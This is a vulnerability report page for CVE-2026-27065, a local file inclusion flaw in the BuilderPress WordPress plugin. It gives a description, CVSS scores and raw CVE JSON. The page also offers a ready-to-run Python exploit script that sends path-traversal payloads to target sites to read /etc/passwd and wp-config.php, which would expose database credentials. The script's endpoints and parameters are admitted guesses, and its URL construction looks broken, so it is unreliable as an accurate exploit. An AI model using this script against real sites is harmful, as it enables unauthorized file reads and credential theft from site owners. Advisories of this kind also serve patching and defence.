Security Vulnerability Report
中文
CVE-2026-27065 CVSS 9.8 CRITICAL

CVE-2026-27065

Published: 2026-03-19 09:16:18
Last Modified: 2026-04-23 15:37:15

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThimPress BuilderPress builderpress allows PHP Local File Inclusion.This issue affects BuilderPress: from n/a through <= 2.0.1.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

BuilderPress <= 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-27065 BuilderPress Local File Inclusion PoC # Target: WordPress site with BuilderPress plugin <= 2.0.1 import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-27065 """ # Common vulnerable endpoints in BuilderPress vulnerable_paths = [ '/wp-content/plugins/builderpress/classes/class-partials.php', '/wp-content/plugins/builderpress/includes/views/layouts/', '/wp-admin/admin.php?page=builderpress_settings' ] # File inclusion parameters to test test_params = [ ('bp_tpl', '../../../../etc/passwd'), ('view', '../../../../wp-config.php'), ('page', '../../../../../../etc/passwd'), ('file', '../../etc/passwd') ] print(f"[*] Testing target: {target_url}") for path in vulnerable_paths: for param, payload in test_params: full_url = f"{target_url}{path}&{param}={payload}" try: response = requests.get(full_url, timeout=10) if 'root:' in response.text or 'root:x:' in response.text: print(f"[+] VULNERABLE! Found file inclusion at: {full_url}") print(f"[+] Successfully read /etc/passwd") return True elif 'DB_NAME' in response.text or 'DB_USER' in response.text: print(f"[+] VULNERABLE! Found wp-config.php leak: {full_url}") return True except requests.RequestException as e: print(f"[-] Request failed: {e}") print("[-] Target does not appear to be vulnerable") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2026-27065-poc.py <target_url>") print("Example: python cve-2026-27065-poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27065", "sourceIdentifier": "[email protected]", "published": "2026-03-19T09:16:17.807", "lastModified": "2026-04-23T15:37:15.417", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThimPress BuilderPress builderpress allows PHP Local File Inclusion.This issue affects BuilderPress: from n/a through <= 2.0.1."}, {"lang": "es", "value": "La vulnerabilidad de 'Control inadecuado del nombre de fichero para la declaración Include/Require en el programa PHP' ('inclusión remota de ficheros PHP') en ThimPress BuilderPress permite la inclusión local de ficheros PHP. Este problema afecta a BuilderPress: desde n/a hasta 2.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/builderpress/vulnerability/wordpress-builderpress-plugin-2-0-1-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}